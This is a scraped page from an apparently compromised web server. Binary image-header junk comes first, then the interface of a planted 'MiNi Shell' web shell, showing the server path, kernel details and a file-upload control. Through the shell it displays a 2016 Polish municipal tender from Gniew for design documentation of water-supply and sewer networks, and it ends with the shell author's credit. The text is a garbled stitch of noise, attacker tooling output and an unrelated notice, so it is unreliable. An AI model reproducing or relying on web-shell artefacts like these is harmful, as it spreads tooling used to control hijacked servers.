JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160415/93002-N-2016.html

<p class="kh_header"><b>Gniew: Opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej rozbudowy sieci wodociągowej i kanalizacyjnej w Gminie Gniew</b><br>
<b>Numer ogłoszenia: 93002 - 2016; data zamieszczenia: 15.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Gniewie , Pl. Grunwaldzki 1, 83-140 Gniew, woj. pomorskie, tel. 058 5352255 w. 14, 39, faks 058 5352258 w. 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gniew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej rozbudowy sieci wodociągowej i kanalizacyjnej w Gminie Gniew.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zakres rzeczowy przedmiotu zamówienia  obejmuje: 

Przedmiotem zamówienia jest opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej rozbudowy sieci wodociągowej w trzech zadaniach oraz uzyskanie, w imieniu zamawiającego, decyzji o pozwoleniu na budowę. Zamawiający udzieli wykonawcy pisemnego pełnomocnictwa w celu uzyskania pozwolenia na budowę. Wytyczne techniczne do projektowania zgodnie z obowiązującymi przepisami prawa budowlanego oraz z zapisami określonymi w warunkach technicznych wydanymi przez gestora sieci - INWEST-KOM w Gniewie sp. z o.o. Wykonawca będzie zobowiązany do uzyskania zgód właścicieli nieruchomości do celów projektowych. Zamawiający wymaga aby wykonawca sprawował nadzór autorski na etapie realizacji inwestycji.   
Nadzór autorski w szczególności obejmuje: 
1)	czuwanie nad zgodnością wykonawstwa z dokumentacją projektową w zakresie rozwiązań użytkowych, technicznych i materiałowych, 
2)	wyjaśnianie przez Wykonawcę wątpliwości powstałych w toku realizacji inwestycji przez dodatkowe informacje i opracowania oraz uzupełnianie szczegółów dokumentacji, 
3)	uzgadnianie z Zamawiającym i Wykonawcą robót możliwości wprowadzania rozwiązań zamiennych w stosunku do przewidzianych w projekcie, 
4)	udział w komisjach i naradach technicznych, odbiorze inwestycji. 
Ponadto, Wykonawca zobowiązany jest do udzielania wszelkich odpowiedzi na pytania dotyczące dokumentacji projektowej jakie mogą zostać zadane przez przedsiębiorców biorących udział 
w postepowaniu, którego przedmiotem zamówienia będzie  budowa poszczególnych odcinków sieci wodociągowej.

Zadanie nr 1 - Odcinek sieci wodociągowej we wsi Piaseczno i Piaseckie  Pole
Przedmiotem zamówienia w ramach zadania nr 1 jest opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej wodociągu długości ok. 7000 mb do i około 45 przyłączy. Włączenie projektowanego wodociągu  do istniejącej sieci  wodociągowej o średnicy 90 mm  w Piasecznie, zasilanej z ujęcia wody w miejscowości Jeleń. Teren na którym planowana jest inwestycja jest częściowo objęty MPZP (działki pod budownictwo jednorodzinne), pozostały teren wymaga uzyskania decyzji lokalizacji celu publicznego.

W związku z powyższym, na podstawie wydanych warunków, wymagana jest dokumentacja projektowo-kosztorysowa budowy zbiornika retencyjnego o poj. 50 m3 w miejscowości Piaseczno,
na działce 557 wraz z zestawem pomp poziomych na falowniku.

W załączeniu warunki techniczne wydane przez spółkę komunalną INWEST-KOM w Gniewie.
Obszar planowanej inwestycji został określony w załączniku  graficznym nr 1



Zadanie nr 2 - Sieć  wodociągowa  Rakowiec - Wyręby Małe  i  Wyręby Wielkie
Przedmiotem zamówienia w ramach zadania nr 2 jest opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej sieci wodociągowej o szacunkowej długości  ok. 5500 m i ok. 25 przyłączy  wodociągowych. 
Dla należytego funkcjonowania sieci i uzyskania właściwego ciśnienia w sieci należy opracować wielobranżową dokumentację projektowo-kosztorysową na modernizację SUW Jeleń poprzez budowę zbiornika retencyjnego o poj. 75 m3 wraz z zestawem pomp poziomych na falowniku.
Na działce 346 w miejscowości  Rakowiec należy zaprojektować i wybudować zbiornik retencyjny o poj. 50m3 oraz stację podnoszenia ciśnienia.
Teren na którym planowana jest inwestycja nie jest objęty MPZP, dlatego wymagane jest uzyskanie decyzji lokalizacji inwestycji celu publicznego.

W załączeniu warunki techniczne wydane przez spółkę komunalną INWEST-KOM w Gniewie.
Obszar planowanej inwestycji został określony w załączniku  graficznym nr 2

Zadanie nr 3 - Sieć wodociągowa Gniew -Brodzkie Młyny- Brody Pomorskie

Przedmiotem zamówienia w ramach zadania nr 1 jest opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej sieci wodociągowej w ulicy Gniewskie Młyny (miasto Gniew) i zasilenie ok. 5 posesji. Włączenie projektowanego wodociągu do istniejącej sieci wodociągowej o średnicy 90 mm zlokalizowanej przy budynku wielorodzinnym  w Gniewie ul. Gniewskie Młyny nr 11.
Przejście wodociągiem pod rzeką Wierzycą, w okolicach istniejącego kolektora kanalizacyjnego
w kierunku miejscowości Brodzkie Młyny (Gogolewo)  oraz część miejscowości Brody Pomorskie (zasilenie około 30 gospodarstw).
Długość projektowanej sieci ok. 4500 m.

Teren, na którym planowana jest inwestycja nie jest objęty MPZP,  wymagane jest uzyskanie decyzji lokalizacji inwestycji celu publicznego.

W załączeniu warunki techniczne wydane przez spółkę komunalną INWEST-KOM w Gniewie.
 Obszar planowanej inwestycji został określony w załączniku  graficznym nr 3

Zadanie nr 4 - Sieć wodociągowo-kanalizacyjana dla fragmentu miasta  Gniew (ul. Nowaka, 
ul. Kopczyńskiego

Przedmiotem zamówienia w ramach zadania nr 4 jest opracowanie wielobranżowej dokumentacji projektowo-kosztorysowej sieci wodociągow-kanalizacyjnej  w ulicach Nowaka i Kopczyńskiego (miasto Gniew) i zasilenie nieruchomości przeznaczonych w MPZP pod budownictwo jednorodzinne wg załącznika graficznego. Na nieczynny odcinek sieci wodociagowej O150 w ul. Kremskiego,
wg warunków technicznych wydanych dla tego terenu (przeznaczony do wymiany) Gmina posiada aktualną dokumentacje techniczną z pozwoleniem na budowę - na sieć wodociągową O150.

W załączeniu warunki techniczne wydane przez spółkę komunalną INWEST-KOM w Gniewie.
 Obszar planowanej inwestycji został określony w załączniku  graficznym nr 3



UWAGA dla wszystkich zadań: 
1.Przyłącza wodociągowe zaprojektować na terenie posesji  i zakończyć studzienką wodomierzową. 
2. Kompletną dokumentację projektową należy wykonać jako oddzielne opracowanie dla każdego zadania.

2. Każda z dokumentacji musi zawierać:
1) mapę do celów projektowych (podkład geodezyjno-wysokościowy) w skali 1:500 i 1:1000               (w zależności od gęstości zabudowy i uzbrojenia na terenie objętym dokumentacją) dla terenu niezbędnego do wykonania przedmiotu zamówienia oraz dla innych terenów, o ile prace projektowe    i uzgodnienia wykażą taką potrzebę.
Zamawiającemu należy przekazać zeskanowaną mapę: na płycie CD w formacie TIFF/lub PDF - 1 egz., oryginał mapy - 1 egz.
2) plan orientacyjny w skali 1: 5000,
3) mapę ewidencji gruntów, wykaz właścicieli i władających, przez jakie działki (nr arkusza, obręb) przechodzą projektowane urządzenia i uzbrojenia, 
4) tabelaryczne zestawienie ( w wersji papierowej) zawierające: nr działki, arkusz, obręb, nr KW, nazwiska właścicieli, ich adresy i numery kontaktowe, powierzchnię pasa roboczego wg wzoru stanowiącego załącznik A do SIWZ.
5) oświadczenia podpisane przez właścicieli lub władających wyrażających zgodę na  zlokalizowanie     i pobudowanie na ich nieruchomościach projektowanych urządzeń i uzbrojenia
6) koncepcję przebiegu sieci  zaakceptowaną przez Zamawiającego wraz z szacunkowymi wartościami: długości sieci, średnice sieci i kosztami robót budowlanych,
7) uzyskaną w imieniu Zamawiającego decyzję o środowiskowych uwarunkowaniach                           dla przedsięwzięcia  publicznego, ewentualnie sporządzenie raportu oddziaływania na środowisko (jeżeli wystąpi taka potrzeba),
8) uzyskaną w imieniu Zamawiającego decyzję o ustaleniu lokalizacji inwestycji celu publicznego/wypis z planu,
9) operat wodno-prawny wraz z uzyskaniem pozwolenia (jeżeli wystąpi taka potrzeba),
10) projekt budowlano-wykonawczy projektowanych sieci  - 6 egz.
11) projekt budowlano-wykonawczy innych urządzeń wraz z zasilaniem energetycznym i włączenia go do istniejącego systemu (jeżeli wystąpi taka potrzeba),  -6 egz.
12) wszelkie wymagane uzgodnienia projektowe (w tym uzyskanie warunków technicznych przyłączenia  do sieci elektroenergetycznych) i inne niezbędne opinie,
13) badania geologiczno - inżynierskie oraz ustalenie geotechnicznych
14) zestawienia wszystkich przyłączy z podaniem numeru działki, adresu, właściciela działki i długości przyłącza.
15) projekt tymczasowej organizacji ruchu - wytyczne dla wykonawcy robót - 5 egz.
16) projekt przebudowy lub zabezpieczenia kolidującej infrastruktury technicznej (w miarę wystąpienia takiej potrzeby) - 3 egz.
17) projekt odtworzenia nawierzchni po robotach uzgodniony z właściwym dla danego obszaru zarządcą drogi lub właścicielem terenu.
18) dokumentacja dendrologiczna (wycinki drzew i krzewów, jeżeli wystąpi taka potrzeba) - 2 egz.
19) specyfikację techniczną wykonania i odbioru robot dla każdej branży - 3 egz.
20) przedmiary robót - 2 egz.
21) kosztorys inwestorski - 2 egz. + zbiorcze zestawienie kosztów - 2 egz.
22) wersję elektroniczną dokumentacji  na płycie DVD   - 1 egz.
23) uzyskanie, w imieniu zamawiającego, decyzji o pozwoleniu na budowę.

3. Dokumentacja stanowiąca przedmiot odbioru powinna być zaopatrzona w następujące załączniki:
1)  wykaz opracowań,
2) pisemne oświadczenie Wykonawcy i sprawdzającego, że dokumentacja jest wykonana zgodnie  z umową, obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej (art. 20 ust. 4 Prawa budowlanego),
3) pisemne oświadczenie Wykonawcy, że dokumentacja zostaje wydana w stanie  zupełnym/ kompletnym dla celu, któremu ma służyć,

Załączniki ww. stanowią integralną część dokumentacji projektowej.

4. Zamawiający zastrzega, by informacje zawarte w dokumentacji w zakresie technologii wykonania robót, doboru materiałów i urządzeń określały przedmiot zamówienia w sposób zgodny z ustawą Prawo zamówień publicznych, tzn. bez używania nazw własnych, a jedynie poprzez określenie parametrów precyzujących rodzaj, standard oraz inne istotne elementy. 

UWAGA: 
Zaleca się, żeby trasy projektowanego uzbrojenia zlokalizowane były, w miarę możliwości, w pasie drogowym, będącym w zarządzie Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia Wykonawcy zamówień uzupełniających w wysokości do 50 % wartości zamówienia podstawowego polegające na powtórzeniu tego samego rodzaju zamówień, zgodnego z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeśli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie wykonał co najmniej 1 usługę polegającą na projektowaniu obiektów liniowych (sieci wodociągowej lub kanalizacyjnej) o długości minimum 4 km w zakresie odpowiadającym przedmiotowi zamówienia. Wykonawca nie może sumować kilku usług 
o mniejszym zakresie dla uzyskania wymaganych wartości porównywalnych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeśli wykonawca wykaże, że dysponuje co najmniej: 
-dwoma osobami posiadającymi uprawnienia projektowe w specjalności instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych, 5 letnie doświadczenie zawodowe oraz wpisanymi na listę członków właściwej izby samorządu zawodowego, potwierdzonymi zaświadczeniem wydanym przez tę izbę, z określonym w nim terminem ważności; 
-jedną osobą posiadającą uprawnienia projektowe w specjalności konstrukcyjnej, 
5 letnie doświadczenie zawodowe oraz wpisaną na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę, 
z określonym w nim terminem ważności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ramach tego warunku wykonawca zobowiązany jest do:
Wykazania, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Minimalna kwota ubezpieczenia to 100.000,00 złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Czas wykonania opracowania - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności.
2. Niedopuszczalne pod rygorem nieważności są zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, z wyjątkiem zmian, o których mowa w ust. 3.
3. Zmiany w umowie mogą dotyczyć:
a) terminu wykonania zamówienia,
b) wysokości wynagrodzenia Wykonawcy,
4. Zmiana terminu wykonania zamówienia może nastąpić w przypadku:
1) rezygnacji z realizacji części zamówienia,
2) przerwy w realizacji zamówienia na skutek działań podmiotów trzecich, np.: przedłużania terminów wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, badań, ekspertyz, uzgodnień z przyczyn niezawinionych przez Wykonawcę,
3) czasowego wstrzymania prac przez Zamawiającego.
5. Zmiana wysokości wynagrodzenia Wykonawcy może nastąpić w przypadku:
1) odstąpienia (rezygnacji) od części zamówienia, lub rozszerzenia jego zakresu,
2) zmiany stawki podatku VAT, przy czym ceny netto nie ulegają zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.gniew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Gniewie, Plac Grunwaldzki 1, 83-140 Gniew, pokój 202.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2016 godzina 12:00, miejsce: Urząd Miasta i Gminy w Gniewie, Plac Grunwaldzki 1, 83-140 Gniew, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com